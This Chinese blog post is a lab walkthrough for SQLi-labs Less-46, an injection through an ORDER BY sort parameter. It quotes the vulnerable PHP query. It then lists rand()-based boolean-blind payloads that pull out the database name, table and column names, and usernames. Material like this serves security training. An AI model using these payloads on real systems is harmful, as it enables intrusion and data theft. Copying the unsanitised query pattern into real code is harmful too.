当前位置:网站首页>SQL注入 Less46(order by后的注入+rand()布尔盲注)

SQL注入 Less46(order by后的注入+rand()布尔盲注)

2022-07-31 22:34:00 华为云 

$id=$_GET['sort'];$sql = "SELECT * FROM users ORDER BY $id";

我们的注入点在 order by 后面的参数中,==而 order by不同于的我们在 where 后的注入点,不能使用 union 等进行注入==。

测试是否存在注入点

?sort=1 desc
?sort=1 asc

desc是 descend 降序意思
asc 是 ascend 升序意思

返回结果不同,说明可以注入。可利用 order by 后的一些参数进行注入

==关于下面的这部分与解题无关,直接看布尔盲注的部分即可==
?sort=right(version(),1)
?sort=left(version(),1)
返回结果都是
在这里插入图片描述
right(version(),1)和left(version(),1)的结果都是数字,
我觉得可能是字符型的数字,所以又试了一下
在这里插入图片描述
不知道是不是会自动进行类型转换啥的

?sort=5
在这里插入图片描述
?sort='5'
在这里插入图片描述

所以,left(version(),1)返回的应该确实是字符型的数字

布尔盲注

select * from users order by rand();
对users表随机进行排序。
rand()返回的是一个0-1的浮点数,order by 后面跟的是列名或列号。
这里其实可以理解成users表中增加了一个rand字段,字段值是随机产生的。根据该rand字段来对users表进行排序。所以就到达了随机排序的效果

更多原理,看这篇
MySQL-17:order by rand()

select * from users order by rand(1);
select * from users order by rand(0);

?sort=rand(1)
在这里插入图片描述

?sort=rand(0)
在这里插入图片描述

?sot=rand(1=1)
在这里插入图片描述

?sort=rand(length(database())=8)

?sort=rand(ascii(substr(database(),1,1))=115)

?sort=rand(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101)

?sort=rand(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i')

?sort=rand(ascii(substr((select username from users limit 0,1), 1,1))=68)

当然这一题可以用时间盲注和报错注入来写的,Less47会用报错注入来写

https://blog.csdn.net/Kevinhanser/article/details/81563461
https://blog.csdn.net/weixin_43901998/article/details/107577630

原网站

版权声明
本文为[华为云]所创,转载请带上原文链接,感谢
https://bbs.huaweicloud.com/blogs/367602

边栏推荐

猜你喜欢

随机推荐